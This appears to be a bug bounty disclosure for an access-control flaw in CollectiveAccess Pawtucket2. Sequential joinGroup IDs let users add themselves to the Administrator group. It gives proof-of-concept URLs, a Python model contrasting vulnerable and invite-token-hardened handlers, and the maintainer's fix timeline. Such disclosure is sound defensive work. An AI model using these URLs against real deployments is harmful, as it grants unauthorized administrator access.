Improper Access Control in collectiveaccess/pawtucket2

Status: Valid

Reported on Sep 30th 2021


Description

An attacker can join any user group in the Pawtucket2 interface because the group ids in the joinGroup URLs are sequential rather than randomised.

Proof of Concept

Any attacker can join the Administrator group using: http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/2

An attacker can join any other group by incrementing the trailing group_id value by 1:

http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/1
http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/3
http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/4

Impact

This vulnerability allows attackers to join the Administrator group and any other group without being invited, bypassing access controls.

Recommended Fix

Use randomized ids in user group creation and access.
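As an added illustration (not CollectiveAccess code, which is PHP), the following Python model reproduces the reported behaviour of a joinGroup handler that trusts a caller-supplied sequential group_id, beside a hardened version in which open groups may be self-joined and every other group requires an unguessable, single-use invite token bound to the requesting user, so that guessing an id, random or not, gains nothing. The group names, the open_enrollment flag and the invite mechanism are assumptions made for the example.

```python
import secrets
from dataclasses import dataclass, field


@dataclass
class Group:
    name: str
    open_enrollment: bool = False                  # may any logged-in user self-join?
    members: set = field(default_factory=set)
    invites: dict = field(default_factory=dict)    # invite token -> user_id it was issued to


def sample_groups():
    # Constructed data for the example; id 2 is the Administrator group, as in the reported PoC URL
    return {
        1: Group("Public", open_enrollment=True),
        2: Group("Administrators"),
        3: Group("Editors"),
    }


def join_group_vulnerable(groups, user_id, group_id):
    """Reported behaviour (modelled, hypothetical): the sequential id supplied by the
    caller is the only input, so any logged-in user can add themselves to any group."""
    groups[group_id].members.add(user_id)
    return True


def issue_invite(groups, group_id, user_id):
    """Maintainer side: mint an unguessable, single-use token bound to one user and group."""
    token = secrets.token_urlsafe(32)
    groups[group_id].invites[token] = user_id
    return token


def join_group_hardened(groups, user_id, group_id, invite_token=None):
    """Server-side authorization: open groups can be joined freely; every other group
    requires an invite token issued to this exact user. Returns True only on success."""
    group = groups.get(group_id)
    if group is None:
        return False                               # unknown id: same answer as "not allowed"
    if group.open_enrollment:
        group.members.add(user_id)
        return True
    if invite_token is None or group.invites.get(invite_token) != user_id:
        return False                               # missing, forged, or someone else's invite
    del group.invites[invite_token]                # single use: a leaked token cannot be replayed
    group.members.add(user_id)
    return True
```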

Timeline

We have contacted a member of the collectiveaccess/pawtucket2 team and are waiting to hear back.
haxatron modified the report.
CollectiveAccess validated this vulnerability.
haxatron has been awarded the disclosure bounty.
CollectiveAccess (Maintainer):

This one is less useful than one might expect, but it should not be like this. Will patch shortly.

CollectiveAccess (Maintainer):

Thank you for pointing it out.

CollectiveAccess marked this as fixed with commit 6c0e8a.
CollectiveAccess has been awarded the fix bounty.
This vulnerability will not receive a CVE.